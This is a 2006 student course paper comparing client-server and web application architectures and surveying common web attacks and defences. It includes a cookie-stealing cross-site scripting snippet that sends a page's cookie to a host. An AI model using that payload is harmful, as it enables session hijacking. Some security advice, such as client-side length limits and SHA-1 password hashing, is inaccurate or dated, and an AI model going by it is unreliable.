College of Business Administration
University of Missouri, St. Louis
MSIS 6840
November 29, 2006
Introduction
Trends
Challenges
Client-server versus Web Application
Key Differences
OWASP Top Ten Most Critical Web Application Security Vulnerabilities
Conclusion
Description of Threats
(Buffer Overflow,
Cross-Site Scripting Flaws,
Broken Access Control a.k.a. Forceful Browsing,
Enumeration Attack,
Invalidated Input,
Broken Authentication and Session Management,
Improper Error Handling,
Denial of Service)
References
Traditionally enterprises focused on client-server architecture to satisfy their information needs. This model of processing enabled multiple users to have access to data and processing power from a central location, through hard-wired client computers. This architecture required limited sophistication of the client computers and large, heavy duty servers that would take and process requests and simply return processed outcomes. This was considered as the “PC revolution” (1) when compared to the host-based computing and batch processing of the 1950’s and 60’s.
In the 1990’s, the Internet added mobility and expanded access to Information Systems(2), however, the client-server model prevailed. Web browsers (3)made their appearance as the tools to surf the World Wide Web but they offered little more than the dummy terminals of the 70’s and 80’s. Web browsers as clients are still connected via (more sophisticated) networks and make requests to centrally located server systems to ultimately display processed data. Although the means (clients and servers) have advanced, the architecture of modern-day computing has remained the same, and has retained many disadvantages and vulnerabilities.
The main concern of network administrators, especially in large organizations with sensitive data, is unauthorized access (4). The danger of outsiders tapping in on a network and having access to data can jeopardize a firm’s reputation and cause legal nightmares, let alone the loss or corruption of crucial information. The hazard is tenfold when access to such databases is given to anyone with a Web browser. The possibilities of an attack increase dramatically (5) and any network must be able to withstand multiple attacks without inhibiting authorized user access.
Companies are using Web applications to have access to and process important data. Web applications gained popularity in the 1990’s; the World Wide Web expanded and the promise of faster, seamless collaboration enticed users (in this case, corporations) to want to adopt this technology as fast as possible. In recent years, it doesn’t suffice to have business intelligence and knowledge-sharing systems, it is perceived as critical to strategic success in almost any industry (6).
Since companies already had legacy client-server IT infrastructure in place, their main focus was to simply migrate the architectural concept and adapt it for use in Web applications. The main reason for this was limited budgets and cost cuttings (7). Management perceived that the existing client-server infrastructure could serve as the foundation for Web applications, thus serving as a means to optimize resources.
Additionally, multitudes of users were gaining access to computers and the World Wide Web, and these applications were gaining popularity within various market segments. The use of Web-based applications would allow corporations to expand their market share by penetrating new target segments. On the other hand, competitors were adopting new Web applications and, therefore, businesses had to maintain at least similar standards in order to stay in the game.
According to John Pescatore of Gartner Group, (1i)“…close to 80% of today’s attacks are tunneling through Web applications”. This is a disturbingly large number, especially more so, because Web browsers hold critical information and data, making anyone with a computer and access to the Internet a potential threat.
Companies use thousands of dollars (8) and hours of man-power to ensure that Web applications run smoothly, and are safeguarded against any attack (2i). Most attacks are attributed to known threats such as worms (3i) (malicious programs that replicate themselves constantly, without requiring another program to provide a safe environment for replication), viruses (4i) (segments of code that perform malicious actions) and identified vulnerabilities found in application servers (4i).
According to Michael E. Whitman and Herbert J. Mattord (8), “…hackers are people who use and create computer software to gain access to information illegally.” Hackers exploit the vulnerabilities found within the application itself to extract sensitive data from corporate databases (10) . Most of these vulnerabilities arise from the fact that Web applications are fundamentally different from client-server platforms. (There are other challenges that have been identified; however, they have been excluded because they are outside the scope of this paper).
In order to better understand the differences between client-server and Web application, it is important to first take a look at their formal definitions.
According to Education World, (5i)“Client-server is a two tiered architecture, where two computer systems are linked by a network or modem connection, and the client computer uses resources by sending requests to the server computer” In other words, Client-server is an environment in which a server application and client application are written to work together. In order for these two components to be compatible, every time a program or application was changed on the server, all client nodes needed to be updated. In addition, the client should have been compatible with multiple programs, consequently making deployment and maintenance expensive. Another arduous task faced by administrators was the installation of applications onto every client machine at every location. Additionally, if any updates were made to the application, each individual machine had to be re-installed with the upgraded versions.
On the other hand, Web applications do not have several of these characteristics. According to Wikipedia.org(6i), “Web applications are delivered to users from a web server over a network such as the World Wide Web”. In other words, the browser in any computer system is the standard part of a client and the rest is downloaded automatically every time a user invokes an application. Thus, clients are platform independent, deployment is virtually free and no maintenance is required on part of the administrator (4i). Moreover, administrators have the flexibility to update and maintain web applications without distributing and installing software on potentially thousands of client computers. This in itself eliminates any need for compatibility, installation and re-installation. Web applications invoke a remote server system to transmit the application interface (prompts, buttons, and logic) together with the required data. On the client-server side, clients have the interface already installed and the server only transmits processed data.
I) Since client-server applications perform data validation on the client side for enhanced user experience, clients were purpose-built and therefore, difficult to reverse engineer. This made it difficult for any user to modify code in the source, since most or all of it was invisible. However, Web applications use browsers which expose the source of client side application to virtually anyone. This makes it easy for users to download and manipulate the source code therefore creating security concerns. Two of the most common attacks threatening Web applications are Buffer Overflow and Cross-Site Scripting Flaws.
II) Another feature of client-server is that users must log in to one Server to gain access. This creates a one-on-one communication between client and server which enables the client to control all user interaction. The client can enable or disable functions every time a user logs in. However, Web applications run many scripts on several web servers, thus creating several entry points (6). Each of these entry points is a potential hazard. Due to this very feature, the web client cannot enforce behavior from server or maintain flow of communication. Common attack threatening Web applications is Broken Access Control, also known as Forceful Browsing.
III) Once a user logs in, a ‘session’ is established connecting the client and server. This allows the client to continuously feed information to the user, and the session is maintained uninterrupted until the user logs out. This way, the client monitors all the information exchange. But this is not the case with Web applications, because the user does not ‘log in’ in the traditional sense. Thus, no ‘session’ is established and administrators must develop an appropriate application to keep track of user activities. The browser acts as a gateway through which many Server applications send pieces of information to be compiled and presented to the user via the browser. There is no session per se, however, the intricacies of the communication are hidden from the user to a degree that it seems like there is a session established. Common threats relative to the No-State characteristics of Web Applications are input tampering manipulations (invalidated input) manipulations like SQL Injection, Cookie Poisoning and Hidden Field manipulation.
IV) The client-server platform has a limited number of clients, a number that perhaps runs into the hundreds or small thousands for very large organizations. But since the Web browser is accessible to literally millions of potential users, the browser should be able to handle this input. This is how a lot of attacks occur whereby hackers exploit this difference to overload servers and expose raw data. A common threat is the Enumeration Attack where users can manipulate requests, override the servers’ security and gain access to sensitive data.
V) Web administrators store sensitive data and information in databases or files. This data can be user accounts, passwords, bank information, and etc. Users entrust corporations to safeguard this information. Administrators use encryption methods in order to protect information, however often times problems may arise when security methods are not properly applied to Web applications. Web applications may become susceptible to attacks when proper encryption is not applied and the application is not secured from intrusion. Since users’ sensitive data is stored in these databases, the results of an intrusion by an attacker can put the corporation in real trouble.
Web administrators may face real trouble when they fail to encrypt critical data, use insecure storage of passwords, use poor algorithms, and fail to include support for encryption key changes and other required maintenance procedures. “The easiest way to protect against cryptographic flaws is to minimize the use of encryption and only keep information that is absolutely necessary. For example, rather than encrypting credit card numbers and storing them, simply require users to re-enter the numbers. Furthermore, instead of storing encrypted passwords, use a one-way function such as SHA-1 to hash the passwords” (9).
The Open Web Application Security Project (OWASP)(7i) is dedicated to helping organizations understand and improve the security of their web applications and web services. This organization has created a Top Ten list which highlights the most serious of web vulnerabilities. Increasingly more hackers are turning their attention to the common weaknesses in Web applications, while administrators are striving to tighten security without compromising user experience.
Figure1. has been specifically adapted to illustrate the OWASP Top Ten Project List.
In conclusion, client-server and Web applications are fundamentally different in many ways although they share common characteristics. The magnitude of Web Applications alone creates a need for differentiation in the way the two architectures are perceived. Therefore, the rules and policies which worked effectively in client-server environment cannot be applied unmodified to Web applications. Four of the key differences as outlined and discussed in this paper are as follows:
Web security should perform some basic functions for an organization (8). It should protect the organization’s ability to function, enable the safe operation of applications that are implemented on the corporations systems, protect data the corporation collects and uses, and safeguard the application in the corporation. Multitudes of users are gaining access to computers and the World Wide Web, thus making Web applications available to a larger, less-trusted user base than legacy client-server applications. Many companies are starting to take initiatives to prevent these types of break-ins like Code reviews, Extensive penetration testing and the installation of Intrusion Detection / Prevention Systems and Devices. However, most of the solutions available today are using negative security logic i.e. working with a list of attacks and trying to prevent against them. Negative security logic solutions can prevent known, generalized attacks, but are ineffective against these kinds of targeted, malicious activities.
Overall, in today’s web distributed computing the need for new concepts and new designs is more apparent than ever. Every new system that is based on this architecture has inherently flawed design and will pose security threats. In a few years it may make sense to re-design web applications in order to eliminate vulnerabilities; after all the cost of designing against threats in contemporary systems may offset the cost of re-design.
This is a common threat that occurs because the source of client
side application is exposed to virtually anyone who accesses the
browser. This makes it easy for the attacker to change codes or input
irregular data. “…buffer overflow occurs when Web application
components in some languages that do not properly validate input can be
crashed and, in some cases, used to take control of a process”(3i)
. Therefore, when an attacker uses inputs that are not easily
deciphered by the application, the application will overrun its memory,
which had been allocated to other applications, in order to interpret
the irregular input.
Attackers use buffer overflows to manipulate the execution of a web
application. They send malicious input to a web application which can
cause the web application to execute arbitrary code effectively and
thus taking over the machine. Buffer overflows are not easily detected
and make it even more difficult for the server to execute.
Nevertheless, attackers have managed to identify buffer overflows in a
staggering number of products and components. A classic example of
Buffer Overflow would be when the browser has a form that requires the
user to input a limited number of digits. For instance, zip codes
(12345) which are commonly only require 5 digits. In this case, the
attacker will key in a long string of numbers, e.g.
324168764213578546754342313768764146940987655443.
The server application components cannot validate this input, and therefore, will compromise the entire application by eating into memory allocated to other tasks. Once this is achieved, the attacker can pass through the server into deeper layers of the infrastructure. Once in, he/she can disable the applications and modify codes to be executed per their wishes.
One way to prevent this attack is to use an application firewall to detect any abnormal lengths that a form is allowed. If the form requires 5 digits, then any input greater than 5 should be alerted. The firewall would also serve to check inputs from client and any irregular inputs monitored. Another way to counterattack is to use HTML and JavaScript to limit number of characters that can be typed within any form or parameter.
“Cross-Site Scripting Flaws occurs when the web application can be
used as a mechanism to transport an attack to an end user's browser”(3i)
. A successful attack can disclose the end user’s session token, attack
the local machine, or spoof content to fool the user. Cross-site
scripting vulnerabilities (also called XSS) occur when an attacker uses
a web application to send malicious code, generally in the form of a
script, to another user. These flaws are quite widespread and occur
anywhere a web application uses input from a user in the output it
generates, without validating it. Since most browsers use JavaScript
and HTML, the basis for this assumption is that every browser has
JavaScript enabled which can be downloaded into user’s browser. This
attack is mostly launched in websites where a lot of postings take
place such as Bulletin boards and Auction sites. The attacker will use
this information to impersonate the user and steal customers’ personal
cookies. By manipulating the data, he/she can send it to remote
database called ‘localhost’. An example of the code used would be :
<script language=“javascript”>
document.write(<img src=http://localhost/?url=‘+document.location +‘&cookie=‘+ document.cookie + ‘>’);
</script> (12)
Web administrators should take extra measures to monitor every server for malicious inputs. Any access should be terminated if any suspicious input is detected. Moreover, any unauthorized access should be denied. Unfortunately, this measure requires companies to redesign some applications. In order to avoid high costs and redesign, companies opt to install network devices that detect malicious inputs. The devices may be less expensive, but they lack the sophistication to differentiate between positive and negative inputs. This causes the devices to produce too many false negatives which fall short of its objective, unless they have an application policy to detect irregular input, differentiate between valid and malicious inputs, and hence, block unwanted requests, and allow valid ones to go through .
Access control, sometimes also called authorization, is how a web application permits some users to gain access to content and functions while others can not. These access control checks are performed after authentication, and establish what authorized users are permitted to do. Access control sounds like a simple problem but is increasingly difficult to implement correctly (9). A web application access control model is closely tied to the content and functions that the site provides. In addition, the users may fall into a number of groups or roles with different abilities or privileges. When restrictions on what authenticated users are allowed to do or not to do is not properly enforced, then Broken Access Control and/or Forceful Browsing can occur.
Strangely, many users are unknowingly using forceful browsing with no malicious intent. When a person uses the Favorite tab in an Internet Explorer browser, he/she is book-marking a page. More often than not, book-marking allows a user to go to the webpage without passing through the homepage of the website. This could mean that the user can bypass previous pages that may require some sort of authentication. Search engines like Google, Yahoo! or MSN also allow users to find and create public links to interior pages of websites, which also means that often times the user may be bypassing prior authentication pages of the website.
Another similar method that attackers use is the bypassing
method by making intelligent guesses. For example, they will skip over
registration pages by taking a weblink named: www.website.com/public.
They begin to omit the word ‘public’ and use words like restricted,
private, and etc. e.g.: www.website.com/restricted,
www.website.com/private, www.website.com/confidential, www.website.com/secret, www.website.com/classified.
In this case, attackers gain access to users' accounts, which enables them to view personal information. It can also permit them to infiltrated corporate databases and view sensitive files or crucial data. Then, what is to stop them from performing any kind of unauthorized function.
Web administrators should preplan an application’s access control requirements and capture it in a web application security policy. It is important to use an access control matrix to define the access control rules which also contains a list of accessible and authorized requests.
The client-server platform is designed to handle the way that servers connect and communicate with a limited (and known) number of clients, whereas the Web browser is accessed and used by thousands or even millions of users. “Enumeration Attack is an attack in which the target host is made to enumerate (or list) the various resources available on the host/network”(8i). The attacker is able to make the target host enumerate, or list, the various resources available on network. This is how a lot of attacks occur whereby hackers exploit this difference to overload servers and expose raw data. Examples of these include user accounts, services, privileges, information and etc. This attack is one of the most popular ways for an attacker to gain information about the users’ information inside the database.
For instance, the attacker will use only one PIN for numerous user
accounts, see Figure 2. As most of us have already experienced, most
Web applications use a detection device for anyone trying to access one
user account with different pin numbers or passwords. For example, if
one forgets the pin number to a bank account, the account is suspended
after three failed tries and the user is requested to contact a
customer representative. However, this attack differs in the sense that
the password or pin number is kept constant and unchanged, and the
attacker uses numerous user names until a match is
found.
Figure 2.
Once the attacker gains entry into the deeper layers of the
application, all user accounts, privileges, services, information and
etc. become available to him/her.
One way to prevent this attack is to redesign the application with the capability to monitor unauthorized access to the login page. Another way is to use an application security.
In Web applications the client does not connect to the server by establishing a session when the user logs in. Since there is no session, the server cannot keep track of user activities, and hence cannot validate the input. Invalidated Input attack occurs when information from web requests is not validated before being used by a web application. Attackers may use these flaws to attack deeper layers through a web application.
In this kind of input tampering attack, the attacker attempts to bypass the website security. Since Web applications use HTTP, attackers try to manipulate any part of an HTTP request, like URL, cookies, form fields, and hidden fields. The most common input tampering attacks are cookie poisoning, SQL injection flaws and hidden field manipulation. Input tampering attacks also include forceful browsing, XXS, and buffer overflows that have been mentioned earlier in this paper.
Cookie Poisoning “…is an input tampering attacking the fields (parameters) stored in a cookie’ (9). Cookie poisoning is “an attack which alters the value of a cookie on the client side prior to a request to the server”(4i). This is commonly more harmful of other tampering attacks because administrators store sensitive data in cookies. The attacker penetrates the security layers to gain access to personal information by modifying the contents of the cookie. Cookies are manipulated by JavaScript to expand the functionality of an application. Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal his identity and impersonate the victim.
It is not easy to detect cookie poisoning attacks because a session is not established to command ‘statefulness’. Simplistic intrusion detection systems which are not Web application oriented may not be able to detect this attack because these products are unable to trace users by the session. Therefore, they cannot track information on each specific user currently logged into the Web application. It is crucial for administrators to digitally encrypt and sign every cookie by the Web server. This is a tedious task because they have to patiently add code to every instance.
SQL Injection Flaw “…is an exploitation in which an attacker inserts SQL commands into form or parameter values rather than legitimate data”(4i). Attackers exploit this Web application vulnerability to send malicious code to other systems or users through using the Web application. If a Web application is poorly designed, an entire script can be injected and executed. These attacks are calls to back-end databases by using SQL. SQL injection exploits the fact that non-validated input vulnerabilities to pass SQL commands via a Web application for execution by a backend database. The standard form or parameter is expected to receive an alphanumeric input, but in this case, the attacker will not use the required alphanumeric, and instead will use an SQL query. This attack translates the form data into an SQL query to the application's database creating unintended behavior. For example: select * from table.
Hidden Field Manipulation “…is attacking the HTML code of the page and changing the value of hidden fields so as to compromise the entire logic” (10)
. Hidden fields are parameters that are unseen by the user and these
parameters are used to provide status information to the Web
application. Attackers can view the HTML code on the web page and
tamper with the hidden field values, thus altering the logic between
various application parts. A common example of hidden field
manipulation is changing the source code and the parameters in form
field(4i).
Administrators can possibly redesign every application so that all
dynamic information is placed into an encrypted cookie. This will also
allow them to monitor request traffic and detect any changes in dynamic
parameters.
As mentioned earlier, Web applications do not establish ‘sessions’(8i). Therefore, Web applications require users to authenticate themselves by using userID , user account and password. However, since HTTP does not provide for sessions in order to keep track of the stream of requests from each user, Web applications should create session management capabilities for themselves. Attackers who can compromise passwords, session cookies and other tokens can defeat authentication restrictions and impersonate other people’s identities. Unfortunately, even solid authentication mechanisms can be undermined by flawed credential management functions. Web administrators should store passwords and other sensitive data in properly encrypted files. They can encourage users to make their passwords complex by using alphanumeric and non-alphanumeric characters. Users should change their passwords regularly.
Error messages are used as guidelines for fixing a problem(9). They contain information on what the error is, and why it occurred. In other words, it gives detailed information not only about the error but also may reveal information about the system itself and how the system operates. Attackers may use this information to look for weaknesses in the application and solicit an attack. The most common form of improper error handling is when detailed internal error messages such as error codes are displayed to the general public. These messages reveal many implementation details that can provide hackers important clues on application flaws. Even when messages don’t reveal a lot of detail, inconsistencies can still show up important clues on how the application works. Web administrators can create a log file. The file will capture relevant, detailed information in a secure log for future analysis and present users with a generic error message that does not contain sensitive information.
Web applications are designed to handle the normal flow of traffic, i.e. legitimate users sending HTTP requests (11i). However, a Web application cannot differentiate between legitimate and malicious requests because it is not easy to identify where an HTTP request is coming from. Denial of service occurs when an attacker attempts to shut down the normal operation of an application by overwhelming the system through a large number of connection or information requests. The attacker will send numerous requests to the target application so that it will not be able to respond to other legitimate requests. It is difficult to protect against denial of service, but administrators can limit the resources allocated to any user to a bare minimum. For authenticated users, it is possible to establish quotas so that they can limit the amount of load a particular user can put on the system. Another way is to allow each user single requests, and as soon as another request is initiated, the previous request can be terminated. For unauthenticated users, unnecessary access to databases or files should be denied. A useful approach might be to cache the content received by unauthenticated users instead of generating it or accessing databases to retrieve it.
Non-web citations
1- Unknown, Asia Computer Weekly, Two Decades of Techonology. Singapore: Jun 28, 1999. pg. 1
2- Jones,George; Elgan, Mike and Potter, Valerie, Fifteen World-Widening Years. InformationWeek. Manhasset: Sep 18, 2006., Iss. 1106; pg. 41, 6 pgs
3- Greisiger, Mark. The Perils of Web Wite Liability. New York: Jul 2002.Vol.49, Iss. 7; pg. 26, 5 pgs
4- Cooney, Michael, Execs Express Top Security Concerns. Network World. Framingham: Jun 5, 2006.Vol.23, Iss. 22; pg. 19, 2 pgs
5- Orr, Bill, Transaction Security. American Bankers Association. ABA Banking Journal. New York: Sep 1995.Vol.87, Iss. 9; pg. 84, 1 pgs
6- Foster, Susan; Hawking, Paul and Stein, Andrew, Business Intelligence Solution Evolution: Adoption and Use. Business Intelligence Journal; Fall 2005; 10, 4; ABI/INFORM Global. pg. 44
7-Thelwall, Mike and Stuart, David. Web Crawling Eethics Revisited: Cost, privacy, and denial of service. Journal of the American Society for Information Science and Technology. Hoboken: Nov 2006.Vol.57, Iss. 13; pg. 1771
8- Heimann, John, Oracle, The Importance of Security Training. CIO Update guest columnist. May 23, 2006.
9- Whitman, Michael E. and Mattord, Herbert J., Principles of Information Security. Boston: Course Technology, 2003
10-Wiedrick-Kozlowski, Jan / Harnetty, Dawn / Angeloni, Jon, Malicious
Code on Storage and Caching Servers and Web 2.0 Security Risks Named as
Top Malware Threats in Newly Released Web Security Trends Report From
Finjan. New York: Oct 11, 2006. pg. n/a
11- Kesh, Someswar, Ph.D. and Ramanujan, Sam, Ph.D., Central Missouri State University, Warrensburg, MO, A Model for Web Server Security Journal of American Academy of Business, Cambridge. Hollywood: Mar 2004. Vol. 4, Iss. 1/2; pg. 354.
Web citations
1i- http://www.ntobjectives.com/know/indoverview.php
2i- http://www.cgisecurity.com/owasp/html/guide.html#id2840663
3i- http://www.cisco.com/web/strategy/docs/healthcare/physician_guide.pdf
4i- http://ctva.mccneb.edu/gsparks/Lecture_Files/INFO_2805/ch02_files/frame.htm#slide0041.htm
5i- http://www.educationworld.com/help/glossary.shtml
6i- http://en.wikipedia.org/
7i- http://www.f5.com/solutions/technology/vulnerabilities_wp.html
8i- http://www.owasp.org/
9i- www.rootsecure.net/content/downloads/pdf
10i- www.rti.org
11i- http://www.computeractive.co.uk/